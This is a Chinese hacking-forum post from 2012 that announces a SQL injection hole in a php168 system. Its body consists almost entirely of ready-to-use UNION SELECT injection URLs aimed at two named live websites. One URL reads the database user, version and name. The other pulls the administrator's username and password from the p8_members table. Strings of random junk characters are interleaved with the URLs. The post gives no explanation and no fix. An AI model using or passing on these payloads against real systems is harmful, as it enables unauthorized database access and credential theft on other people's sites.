找回密码
 立即注册
查看: 3724|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
1 v# H: q# j7 B; q7 V( h4 a                                                         : ~" R5 a$ C6 k6 C8 O
                                       / g; A, Q4 j+ s! r
0 Y0 W! T2 ?8 J5 ~" H5 ]- V9 ^
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--! K+ g- a* n5 O1 k: }" r% x
                                                     6 g) @- B: g1 u2 y2 h. k' D
                                                                  
! h+ {7 P: F9 `3 x9 [  j- G9 j0 s                                                        
" e) J/ I+ Q; {" n/ Lhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
/ e+ {7 B  _+ O4 n+ L7 F% h9 q1 `& f; G# e1 v$ }$ U) Q3 I$ m0 i

+ n6 P+ a8 Q6 K( \5 c, v: d
" V, A! w8 |  E, g$ X/ W2 |                                                            
  m" t1 ~2 h8 C$ J  ?  D! g4 V , ]% L1 ~: F: e: m% h! n$ P
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--/ ~% l* s, J' w9 H6 f. G
8 H* D' n0 B) w5 S

. j7 _. i, f" S# ], p0 c& S! u+ ^6 i8 I7 G4 R0 B+ u2 p
                                                                    2 X0 ?' R  G0 J+ z, D

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表